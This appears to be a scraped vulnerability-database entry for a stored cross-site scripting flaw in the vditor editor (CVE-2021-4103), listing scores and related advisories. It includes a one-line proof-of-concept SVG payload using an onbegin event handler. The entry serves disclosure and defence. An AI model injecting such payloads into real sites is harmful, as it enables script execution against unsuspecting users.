Lucene search
GoogleOSV:GHSA-CXM3-V4MV-6MH8HistoryJan 28, 2022 - 10:04 p.m.
vditor Vulnerable to Cross-site Scripting in SVG events
2022-01-2822:04:11
Google
osv.dev
7
vditor
cross-site scripting
svg events
user input
software
xss
EPSS
0.001
Percentile
21.4%
vditor does not filter user input in SVG events, leading to XSS
PoC
</a>
<svg><animate onbegin=alert(11) attributeName=x dur=1s>
Related
veracode
veracode
Cross-Site Scripting (XSS)
2022-01-24 08:05:01
osv
osv
CVE-2021-4103
2022-01-23 02:15:06
cve
cve
CVE-2021-4103
2022-01-23 02:15:06
cvelist
cvelist
CVE-2021-4103 Cross-site Scripting (XSS) - Stored in vanessa219/vditor
2022-01-23 01:45:11
huntr
huntr
Cross-site Scripting (XSS) - Stored in vanessa219/vditor
2021-12-10 07:01:49
prion
prion
Cross site scripting
2022-01-23 02:15:00
github
github
vditor Vulnerable to Cross-site Scripting in SVG events
2022-01-28 22:04:11
cnvd
cnvd
vditor cross-site scripting vulnerability
2022-01-25 00:00:00
nvd
nvd
CVE-2021-4103
2022-01-23 02:15:06